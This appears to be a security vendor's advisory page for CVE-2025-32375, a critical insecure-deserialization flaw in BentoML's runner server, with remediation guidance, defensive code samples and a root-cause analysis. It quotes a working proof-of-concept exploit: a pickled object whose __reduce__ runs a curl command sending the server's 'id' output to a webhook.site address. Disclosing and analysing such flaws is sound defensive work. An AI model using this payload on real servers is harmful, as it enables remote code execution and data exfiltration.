How severe is GHSA-7v4r-c989-xh26?

GHSA-7v4r-c989-xh26 has a CVSS score of 9.8/10, rated CRITICAL. Immediate patching is strongly recommended.

Which packages are affected by GHSA-7v4r-c989-xh26?

GHSA-7v4r-c989-xh26 affects the following packages: bentoml (PyPI). Ecosystems affected: PyPI.

How do I fix GHSA-7v4r-c989-xh26?

Update bentoml to 1.4.8 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-7v4r-c989-xh26 is resolved across your whole dependency graph.
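As a rough illustration of the version check, the sketch below tests whether a version string falls inside the vulnerable range listed in this advisory (1.0.0a1 up to, but not including, 1.4.8). The helper names `parse`, `is_vulnerable`, and `installed_bentoml_is_vulnerable` are hypothetical, and the parsing is a simplification of PEP 440 that treats any pre-release of 1.4.8 as still vulnerable; a full version parser would be more precise.

```python
import re
from importlib import metadata

FIXED = (1, 4, 8)           # first patched release, per this advisory
FIRST_AFFECTED = (1, 0, 0)  # the advisory range starts at 1.0.0a1


def parse(version: str):
    """Return (release_tuple, is_prerelease) for a simple version string."""
    match = re.match(r"^(\d+(?:\.\d+)*)(.*)$", version.strip())
    if not match:
        raise ValueError(f"unrecognized version: {version!r}")
    release = tuple(int(part) for part in match.group(1).split("."))
    release += (0,) * (3 - len(release))  # pad "1.4" to (1, 4, 0)
    suffix = match.group(2).lower()
    is_pre = bool(re.match(r"^[.\-_]?(a|b|c|rc|dev|alpha|beta|pre)", suffix))
    return release, is_pre


def is_vulnerable(version: str) -> bool:
    """True if the version lies in the range >= 1.0.0a1 and < 1.4.8 (simplified)."""
    release, is_pre = parse(version)
    if release < FIRST_AFFECTED or release > FIXED:
        return False
    if release == FIXED:
        return is_pre  # e.g. 1.4.8rc1 sorts before 1.4.8
    return True


def installed_bentoml_is_vulnerable():
    """Check the bentoml installed in this environment; None if it is absent."""
    try:
        return is_vulnerable(metadata.version("bentoml"))
    except metadata.PackageNotFoundError:
        return None
```

Running `installed_bentoml_is_vulnerable()` inside each deployed environment covers the case where a transitive dependency resolved to an older release than the one you pinned.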

How do I detect GHSA-7v4r-c989-xh26 in my PyPI dependencies?

Scan your Python dependency files (requirements.txt, poetry.lock, Pipfile.lock, etc.) for bentoml. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
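A minimal sketch of such a scan for a requirements.txt file is shown here. It only finds exact `bentoml==X` pins, so range specifiers, lock files, and transitive dependencies are out of scope; the function name `find_bentoml_pins` is a hypothetical helper, not part of any tool named on this page.

```python
import re

# Matches lines such as "bentoml==1.4.7" or "bentoml[grpc]==1.3.0".
PIN = re.compile(r"^\s*bentoml(?:\[[^\]]*\])?\s*==\s*([^\s;#]+)", re.IGNORECASE)


def find_bentoml_pins(requirements_text: str):
    """Yield (line_number, pinned_version) for each exact bentoml pin."""
    for number, line in enumerate(requirements_text.splitlines(), start=1):
        match = PIN.match(line)
        if match:
            yield number, match.group(1)


sample = """numpy==1.26.4
bentoml==1.4.7  # serving
bentoml[grpc]==1.3.0
# bentoml==1.0.0
"""
pins = list(find_bentoml_pins(sample))
print(pins)
```

Each reported version can then be compared against the fixed release, 1.4.8.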

How do I mitigate GHSA-7v4r-c989-xh26 if there is no patch (or I can't update yet)?

If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
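One general way to validate pickled input at the boundary is the allowlisting pattern from the Python `pickle` documentation: subclass `pickle.Unpickler` and override `find_class` so that only approved globals can be resolved. The sketch below is illustrative only. It is not the fix shipped in bentoml 1.4.8, and the allowlist here is an assumption that would need extending (for example, for NumPy types) before real payloads would load.

```python
import builtins
import io
import pickle

# Assumption: a deliberately tiny allowlist, for illustration only.
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Resolve only explicitly approved builtins; refuse everything else.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Like pickle.loads, but refuses any global outside the allowlist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()
```

Plain containers of primitives still load, while a payload whose `__reduce__` names a callable such as `eval` or `os.system` is rejected before the callable is ever invoked.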

How does O3 Security protect against GHSA-7v4r-c989-xh26?

O3 pinpoints whether GHSA-7v4r-c989-xh26 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Is GHSA-7v4r-c989-xh26 actively exploited in the wild?

At least one public exploit exists. There is 1 known exploit reference for GHSA-7v4r-c989-xh26: the theGEBIRGE/CVE-2025-32375 proof-of-concept repository. All exploit code should only be run in an isolated sandbox environment for research or authorized testing, never against production systems without explicit written authorization.

What is the EPSS score for GHSA-7v4r-c989-xh26?

GHSA-7v4r-c989-xh26 has an EPSS (Exploit Prediction Scoring System) score of 43.8%, placing it in the 99th percentile of all CVEs. EPSS is maintained by FIRST.org and estimates the probability that a vulnerability will be exploited in the wild within the next 30 days. This score warrants monitoring and prompt remediation.

What type of vulnerability is GHSA-7v4r-c989-xh26?

GHSA-7v4r-c989-xh26 is classified as Deserialization of Untrusted Data (CWE-502). The weakness type describes the underlying flaw category, which helps determine the potential impact and the right class of mitigation. This is a high-impact weakness class that often enables remote code execution or data exposure.

When was GHSA-7v4r-c989-xh26 published, and has it been updated?

GHSA-7v4r-c989-xh26 was published on April 9, 2025 and was last updated on June 10, 2026. Advisory data evolves as severity scores, affected ranges, and exploit intelligence are revised — always check the latest version of the advisory before acting.

🐍 PyPI

GHSA-7v4r-c989-xh26

CRITICAL

BentoML's runner server Vulnerable to Remote Code Execution (RCE) via Insecure Deserialization

Also known as CVE-2025-32375, PYSEC-2025-32

Published: Apr 9, 2025

Updated: Jun 10, 2026

Affected: 1 pkg

Patched: 1 / 1

Exploits: 1 known

EPSS Exploitation Probability

via FIRST.org ↗

43.8% probability of exploitation in next 30 days

High Risk · 99th percentile · -21.43%

EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.

Blast Radius

1 pkg affected

🐍 bentoml

Description

Summary

BentoML's runner server contains an insecure deserialization vulnerability. By setting specific headers and parameters in a POST request, an attacker can execute arbitrary code on the server, gaining initial access and exposing information held on it.

PoC

First, create a file named model.py that defines a simple model and saves it:

import bentoml
import numpy as np

class mymodel:
    def predict(self, info):
        return np.abs(info)
    def __call__(self, info):
        return self.predict(info)

model = mymodel()
bentoml.picklable_model.save_model("mymodel", model)

Then run the following command to save this model

python3 model.py

Next, create bentofile.yaml to build this model

service: "service.py"  
description: "A model serving service with BentoML"  
python:
  packages:
    - bentoml
    - numpy
models:
  - tag: MyModel:latest  
include:
  - "*.py"

Then, create service.py to host this model

import bentoml
from bentoml.io import NumpyNdarray
import numpy as np


model_runner = bentoml.picklable_model.get("mymodel:latest").to_runner()

svc = bentoml.Service("myservice", runners=[model_runner])

async def predict(input_data: np.ndarray):

    input_columns = np.split(input_data, input_data.shape[1], axis=1)
    result_generator = model_runner.async_run(input_columns, is_stream=True)
    async for result in result_generator:
        yield result

Then, run the following commands to build and host this model

bentoml build
bentoml start-runner-server --runner-name mymodel --working-dir . --host 0.0.0.0 --port 8888

Finally, run the Python script below (exploit.py) to exploit the insecure deserialization vulnerability in BentoML's runner server.

import requests
import pickle

url = "http://0.0.0.0:8888/"

headers = {
    "args-number": "1",
    "Content-Type": "application/vnd.bentoml.pickled",
    "Payload-Container": "NdarrayContainer", 
    "Payload-Meta": '{"format": "default"}',
    "Batch-Size": "-1",
}

class P:
    def __reduce__(self):
        return  (__import__('os').system, ('curl -X POST -d "$(id)" https://webhook.site/61093bfe-a006-4e9e-93e4-e201eabbb2c3',))

response = requests.post(url, headers=headers, data=pickle.dumps(P()))

print(response)

Replacing NdarrayContainer with PandasDataFrameContainer in the Payload-Container header also works. After exploit.py runs, the output of the id command is sent to the webhook server.
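The mechanism the PoC relies on can be seen with a harmless stand-in. When an object defines `__reduce__`, `pickle.loads` calls the returned callable with the returned arguments and hands back the result. The sketch below uses `int` as that callable, so nothing dangerous runs; the class name `Harmless` is purely illustrative.

```python
import pickle


class Harmless:
    def __reduce__(self):
        # (callable, args): on load, pickle calls int("42") and returns the result.
        return (int, ("42",))


blob = pickle.dumps(Harmless())
result = pickle.loads(blob)

# The loaded object is whatever the callable returned, not a Harmless instance.
print(type(result).__name__, result)  # prints: int 42
```

The PoC substitutes `os.system` for `int`, which is why deserializing an attacker-supplied body amounts to running an attacker-supplied command.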

Root Cause Analysis:

The BentoML runner server handles requests in src/bentoml/_internal/server/runner_app.py. When the args-number request header equals 1, the handler calls _deserialize_single_param, as shown below:

https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L291-L298
async def _request_handler(request: Request) -> Response:
    assert self._is_ready

    arg_num = int(request.headers["args-number"])
    r_: bytes = await request.body()

    if arg_num == 1:
        params: Params[t.Any] = _deserialize_single_param(request, r_)

_deserialize_single_param reads the Payload-Container, Payload-Meta, and Batch-Size request headers and combines them with the request body into a Payload object:

https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L376-L393
def _deserialize_single_param(request: Request, bs: bytes) -> Params[t.Any]:
    container = request.headers["Payload-Container"]
    meta = json.loads(request.headers["Payload-Meta"])
    batch_size = int(request.headers["Batch-Size"])
    kwarg_name = request.headers.get("Kwarg-Name")
    payload = Payload(
        data=bs,
        meta=meta,
        batch_size=batch_size,
        container=container,
    )
    if kwarg_name:
        d = {kwarg_name: payload}
        params: Params[t.Any] = Params(**d)
    else:
        params: Params[t.Any] = Params(payload)

    return params

After building the Params object that wraps the payload, the handler calls infer with params as input:

https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L303-L304
try:
  payload = await infer(params)

Inside infer, params (an instance of class Params) calls its map method with AutoContainer.from_payload as the argument:

https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L278-L289
async def infer(params: Params[t.Any]) -> Payload:
      params = params.map(AutoContainer.from_payload)

      try:
          ret = await runner_method.async_run(
              *params.args, **params.kwargs
          )
      except Exception:
          traceback.print_exc()
          raise

      return AutoContainer.to_payload(ret, 0)

Class Params defines map, which applies the given function (here AutoContainer.from_payload) to every argument. Each argument is a Payload carrying data, meta, batch_size, and container:

https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/utils.py#L59-L66
def map(self, function: t.Callable[[T], To]) -> Params[To]:
    """
    Apply a function to all the values in the Params and return a Params of the
    return values.
    """
    args = tuple(function(a) for a in self.args)
    kwargs = {k: function(v) for k, v in self.kwargs.items()}
    return Params[To](*args, **kwargs)
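To make the fan-out concrete, here is a simplified stand-in for `Params` (not the BentoML class itself, which is generic and typed) together with a hypothetical `fake_from_payload` function that only records what it receives. It shows that `map` hands every positional and keyword value to the supplied function.

```python
class Params:
    """Simplified stand-in for BentoML's Params, for illustration only."""

    def __init__(self, *args, **kwargs):
        self.args = args
        self.kwargs = kwargs

    def map(self, function):
        # Apply the function to each positional and keyword value.
        args = tuple(function(a) for a in self.args)
        kwargs = {k: function(v) for k, v in self.kwargs.items()}
        return Params(*args, **kwargs)


calls = []


def fake_from_payload(payload):
    # Hypothetical placeholder for AutoContainer.from_payload.
    calls.append(payload)
    return f"decoded:{payload}"


mapped = Params("body-a", named="body-b").map(fake_from_payload)
print(mapped.args, mapped.kwargs, calls)
```

In the real server the mapped function is `AutoContainer.from_payload`, so every request-derived payload passes through the deserializer.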

Class AutoContainer defines from_payload, which looks up a container class by payload.container (the value of the Payload-Container header) and returns the result of calling from_payload on that class:

https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/container.py#L710-L712
def from_payload(cls, payload: Payload) -> t.Any:
    container_cls = DataContainerRegistry.find_by_name(payload.container)
    return container_cls.from_payload(payload)

If the attacker sets the Payload-Container header to NdarrayContainer or PandasDataFrameContainer, that class's from_payload is called. It checks whether the payload format is "default" and, if so, calls pickle.loads(payload.data). Both inputs are attacker-controlled: payload.meta["format"] comes from the Payload-Meta header, which the attacker can set to {"format": "default"}, and payload.data is the request body, which in my request is the pickled malicious class P. Unpickling it triggers the __reduce__ method and executes arbitrary commands (the curl command in my example).

https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/container.py#L411-L416
def from_payload(
    cls,
    payload: Payload,
) -> ext.PdDataFrame:
    if payload.meta["format"] == "default":
        return pickle.loads(payload.data)
https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/container.py#L306-L312
def from_payload(
    cls,
    payload: Payload,
) -> ext.NpNDArray:
    format = payload.meta.get("format", "default")
    if format == "default":
        return pickle.loads(payload.data)
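The conditions traced above can be summarized as a small predicate over the request headers. This is a sketch of the logic as described in this write-up, covering only the two containers and the single-argument path shown; the function name `reaches_pickle_loads` is hypothetical and the code is not part of BentoML.

```python
import json

# Containers whose from_payload calls pickle.loads, per the snippets above.
PICKLE_CONTAINERS = {"NdarrayContainer", "PandasDataFrameContainer"}


def reaches_pickle_loads(headers: dict) -> bool:
    """True if these headers would route the request body into pickle.loads."""
    lowered = {key.lower(): value for key, value in headers.items()}
    container = lowered.get("payload-container")
    if container not in PICKLE_CONTAINERS:
        return False
    try:
        meta = json.loads(lowered.get("payload-meta", "{}"))
    except json.JSONDecodeError:
        return False
    if not isinstance(meta, dict):
        return False
    if container == "NdarrayContainer":
        # The ndarray container falls back to "default" when format is absent.
        return meta.get("format", "default") == "default"
    # The DataFrame container indexes meta["format"] directly.
    return meta.get("format") == "default"


poc_headers = {
    "args-number": "1",
    "Content-Type": "application/vnd.bentoml.pickled",
    "Payload-Container": "NdarrayContainer",
    "Payload-Meta": '{"format": "default"}',
    "Batch-Size": "-1",
}
print(reaches_pickle_loads(poc_headers))  # prints: True
```

A predicate like this could serve as a detection rule in request logs or at a proxy in front of the runner port, under the assumption that no legitimate client outside the trusted network needs to send such requests.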

Impact

The proof of concept above shows how an attacker can execute the id command and send its output to an external server. By replacing id with any other OS command, an attacker can use this insecure deserialization in BentoML's runner server to obtain a remote shell on the server and install backdoors for persistent access.

Affected Packages

1 total · 1 fixed

Ecosystem	Package	Vulnerable range	Fix
🐍 PyPI	`bentoml`	≥ 1.0.0a1, < 1.4.8	1.4.8

Exploits & PoCs

Research use only. For defensive security, authorized penetration testing, and academic research only. Never execute exploit code against systems without explicit written authorization.

theGEBIRGE/CVE-2025-32375

This repository includes everything needed to run a PoC exploit for CVE-

⭐ 3 · 🍴 1 · May 2025

Detection & mitigation playbook

Open-source dependency

Detect
Scan your Python dependency files (requirements.txt, poetry.lock, Pipfile.lock, etc.) for bentoml. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update bentoml to 1.4.8 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-7v4r-c989-xh26 is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-7v4r-c989-xh26 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-7v4r-c989-xh26. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

O3 Security · Impact-Aware SCA

Is GHSA-7v4r-c989-xh26 in your dependencies?

O3 detects GHSA-7v4r-c989-xh26 across PyPI dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.
